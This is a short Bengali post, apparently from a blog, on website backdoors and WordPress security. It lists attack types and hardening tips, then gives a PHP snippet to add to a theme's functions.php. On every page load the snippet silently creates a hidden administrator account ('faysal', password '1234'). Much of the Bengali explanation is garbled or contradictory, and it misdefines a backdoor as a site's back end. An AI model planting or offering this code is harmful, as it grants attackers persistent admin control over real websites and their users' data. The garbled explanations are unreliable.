ব্যাকডোর হলো ওয়েবসাইটের পেছনের অংশ, অর্থাৎ ওয়েবসাইটের ডেটাবেস, ফাইল সিস্টেম, সার্ভারের সেটিংস, কোড ফাইল ইত্যাদি। এটি ওয়েবসাইটের পেছনের সমস্ত কাজের মৌলিক অংশ।
একে হ্যাকাররা অনেকভাবে অপহরণ করতে পারেন, যেমন:
- SQL Injection: হ্যাকাররা ওয়েবসাইটের ফর্ম ফিল্ড বা URL প্যারামিটারে অসাধারণ কোড লেখে SQL কোয়েরি ইনজেকশন করে ডেটাবেসে অ্যাক্সেস পেতে পারে।
- ম্যালওয়্যার ইনসার্ট: হ্যাকাররা ওয়েবসাইটে একটি ম্যালওয়্যার ইনসার্ট করতে পারেন, যার মাধ্যমে তারা সার্ভারে অনুমোদিত অ্যাক্সেস পায়।
- ফিশিং আক্রমণ: হ্যাকাররা ব্যবহারকারীদের ধারণা দেওয়ার জন্য ভুল লোকেশনে প্রেরিত মেইল, মেসেজ বা লিঙ্ক ব্যবহার করতে পারেন।
- প্রয়োগ প্রস্তুতির ব্যবস্থা: হ্যাকাররা ব্যবস্থা সার্ভার ও সিস্টেমে ব্যবহারকারী অ্যাক্সেস পেতে পারে, যেমন শেল কোড বা অন্যান্য অনুমোদিত কোড প্রয়োগ করে।
ওয়ার্ডপ্রেস ওয়েবসাইটে ব্যাকডোর মাধ্যমে হ্যাকাররা ড্যাশবোর্ডে অনুপ্রবেশ করতে পারে যদি ওয়ার্ডপ্রেসের সিকিউরিটি প্রস্তুতি পারিশ্রমিক না থাকে। হ্যাকাররা সাধারণত ওয়ার্ডপ্রেসের একটি অনুমোদিত ব্যবহারকারীর ক্রেডেনশিয়ালস অনুমোদিত ব্যবহার করে অ্যাক্সেস পেতে পারে। এরপরে, তারা ওয়ার্ডপ্রেস ড্যাশবোর্ডে প্রবেশ করতে পারে এবং কোড ফাইল সম্পাদনা করতে পারে, ডেটা বা ফাইল সিস্টেমে অনুমোদিত অ্যাক্সেস পেতে পারে।
ওয়ার্ডপ্রেসে এই ধরনের আক্রমণের প্রতিরোধের জন্য অনেক সুরক্ষা উপায় রয়েছে, যেমন:
– সঠিক সিকিউরিটি প্লাগইন ব্যবহার করা।
সুস্থ ওয়ার্ডপ্রেস থিম এবং প্লাগইন ব্যবহার করা।
- সিকিউরিটি হোস্টিং সেটিংস ব্যবহার করা।
- সুনিধানে ডেটাবেস এক্সেস অনুমোদিত করা।
- নিয়মিত ওয়ার্ডপ্রেস আপডেট এবং ব্যবহারকারী পাসওয়ার্ড পরিবর্তন করা।
সাম্প্রতিক সুপারিশেন: যেকোনো ওয়ার্ডপ্রেস সাইটের সিকিউরিটি প্লাগইন ব্যবহার করে আপনার সাইটের সিকিউরিটি মজবুত করুন, এবং নিয়মিতভাবে আপডেট করুন।
ব্যাকডোর-add to theme functions.php
function wpb_admin_account(){
$user = ‘faysal’;
$pass = ‘1234’;
$email = ’email@flfaysal.com’;
if ( !username_exists( $user ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$user = new WP_User( $user_id );
$user->set_role( ‘administrator’ );
}
}
add_action(‘init’,’wpb_admin_account’);